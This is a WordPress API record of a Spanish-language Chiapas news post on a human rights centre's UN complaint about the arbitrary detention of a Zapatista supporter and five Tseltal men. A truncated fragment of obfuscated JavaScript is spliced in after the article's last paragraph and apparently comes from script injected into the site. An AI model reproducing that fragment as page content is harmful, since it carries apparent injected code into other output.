{"id":11193,"date":"2023-08-07T04:19:41","date_gmt":"2023-08-07T04:19:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11193"},"modified":"2023-08-07T04:19:41","modified_gmt":"2023-08-07T04:19:41","slug":"piden-intervencion-de-la-onu-para-liberacion-de-presos-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11193","title":{"rendered":"Piden intervenci\u00f3n de la ONU para liberaci\u00f3n de presos en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/NOTA-FRAY.jpg\" alt=\"\" class=\"wp-image-11194\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/NOTA-FRAY.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/NOTA-FRAY-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/NOTA-FRAY-150x150.jpg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/NOTA-FRAY-768x768.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>6 de agosto del 2023. San Crist\u00f3bal de Las Casas.- El Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas (Frayba), dio a conocer que ha presentado una denuncia ante el Grupo de Trabajo sobre Detenciones Arbitrarias (GTDA) de la Organizaci\u00f3n de las Naciones Unidas (ONU) para la liberaci\u00f3n de presos en Chiapas Manuel G\u00f3mez V\u00e1zquez, Base de Apoyo del Ej\u00e9rcito Zapatista de Liberaci\u00f3n Nacional (EZLN) y Manuel S\u00e1ntiz Cruz, Agust\u00edn P\u00e9rez Dom\u00ednguez, Juan Velasco Aguilar, Mart\u00edn P\u00e9rez Dom\u00ednguez y Agust\u00edn P\u00e9rez Velasco, cinco ind\u00edgenas tseltales del municipio de San Juan Cancuc.<\/p>\n\n\n\n<p>En un comunicado, aseguran que en el caso de Manuel G\u00f3mez, la acusaci\u00f3n en su contra fue un acto de criminalizaci\u00f3n a su adherencia zapatista y a m\u00e1s de dos a\u00f1os y medio de su detenci\u00f3n es mantenido en reclusi\u00f3n de manera arbitraria bajo la medida cautelar de prisi\u00f3n preventiva, es decir sin haber recibido una sentencia, a\u00fan cuando la Constituci\u00f3n mexicana establezca un l\u00edmite de dos a\u00f1os.<\/p>\n\n\n\n<p>En el caso de los cinco ind\u00edgenas de Cancuc, recuerdan que fueron sustra\u00eddos de su comunidad por elementos policiales acompa\u00f1ados de la Guardia Nacional y las Fuerzas Armadas, donde se les invent\u00f3 un informe de detenci\u00f3n con hechos falsos acus\u00e1ndolos de una supuesta detenci\u00f3n por portaci\u00f3n de drogas en otro municipio.<\/p>\n\n\n\n<p>\u201cLos detenidos fueron despu\u00e9s procesados y sentenciados por un homicidio que no cometieron. El objetivo de esta criminalizaci\u00f3n fue el de enviar un mensaje ejemplar hacia la poblaci\u00f3n a fin de que no se organicen contra la imposici\u00f3n de proyectos de infraestructura carretera en su territorio y lo defiendan de la militarizaci\u00f3n\u201d, suscriben.<\/p>\n\n\n\n<p>Hacen un llamado al Estado mexicano, a trav\u00e9s de la denuncia presentada ante el Grupo de Trabajo de la ONU, \u201cque cesen los patrones de criminalizaci\u00f3n y represi\u00f3n hacia los pueblos originarios, en espec\u00edfico hacia las personas vulneradas en sus derechos por estos mecanismos de violencia institucional, adem\u00e1s de que sean resarcidos los derechos humanos bajo los m\u00e1s altos est\u00e1ndares internacionales incluidos el de la libertad absoluta\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 6 de agosto del 2023. San Crist\u00f3bal de Las Casas.- El Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas (Frayba), dio a conocer que ha presentado una denuncia ante el Grupo de Trabajo sobre Detenciones Arbitrarias (GTDA) de la Organizaci\u00f3n de las Naciones Unidas (ONU) para la liberaci\u00f3n de presos en Chiapas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11194,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11193","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11193"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11193\/revisions"}],"predecessor-version":[{"id":11195,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11193\/revisions\/11195"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11194"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}